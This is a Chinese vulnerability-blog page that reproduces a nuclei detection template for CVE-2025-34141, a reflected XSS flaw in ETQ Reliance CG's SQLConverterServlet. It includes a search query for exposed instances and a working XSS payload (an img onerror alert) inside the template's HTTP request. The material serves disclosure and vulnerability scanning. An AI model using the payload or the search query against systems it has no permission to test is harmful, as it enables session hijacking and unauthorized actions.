ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability

漏洞信息

漏洞名称: ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability

漏洞编号:

  • CVE: CVE-2025-34141

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: ETQ Reliance CG(传统)平台中的SQLConverterServlet组件存在反射型跨站脚本(XSS)漏洞。此漏洞需要用户交互,例如点击特制链接,并可能导致在用户上下文中执行未经授权的脚本。受影响的servlet不必要地暴露给已认证用户,并在版本SE.2025.1中被禁用。

受影响的产品:ETQ Reliance CG(传统)是一个质量管理软件平台,广泛应用于企业级服务中,用于跟踪和管理质量流程。该平台的典型部署场景包括制造业、医疗保健和金融服务等行业。

漏洞解释:此漏洞属于跨站可执行脚本(XSS)类型,其技术根源在于SQLConverterServlet组件对用户输入的不当处理,导致攻击者能够注入恶意脚本。这些脚本在受害者的浏览器中执行,可能窃取会话令牌或其他敏感信息。

影响分析:成功利用此漏洞的攻击者可以在已认证用户的浏览器会话上下文中执行任意JavaScript代码,可能导致会话劫持或未经授权的操作。由于需要用户交互,此漏洞的自动化利用可能性较低,但其潜在的安全风险包括数据泄露和服务中断。

产品厂商: ETQ

产品名称: ETQ Reliance CG (legacy)

影响版本: version < SE.2025.1

搜索语法: html:”ETQ Reliance”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/49ebb40a9df9214701e1423a4ece95cfd3879eaa/http%2Fcves%2F2025%2FCVE-2025-34141.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65

id: CVE-2025-34141

info:
  name: ETQ Reliance - Reflected XSS via SQLConverterServlet
  author: slcyber,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the SQLConverterServlet component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
  impact: |
    Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated user's browser session, potentially leading to session hijacking or unauthorized actions.
  remediation: |
    Upgrade to ETQ Reliance version SE.2025.1 or later where the SQLConverterServlet has been disabled.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34141
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-34141
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"ETQ Reliance"
  tags: cve,cve2025,etq-reliance,xss

flow: |
  http(1)
  if(template.path){
   http(2)
  } else {
   set("path","reliance")
   http(2)
  }

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: header
        internal: true
        name: path
        group: 1
        regex:
          - 'Location: https?://.*?/(.*?)/'

  - raw:
      - |
        GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '</textarea><img src=x onerror=alert(document.domain)>'
          - 'You have to start the ENGINE application before using this form.'
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #跨站可执行脚本
ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability
http://example.com/2025/07/23/github_141416666/
作者
lianccc
发布于
2025年7月23日
许可协议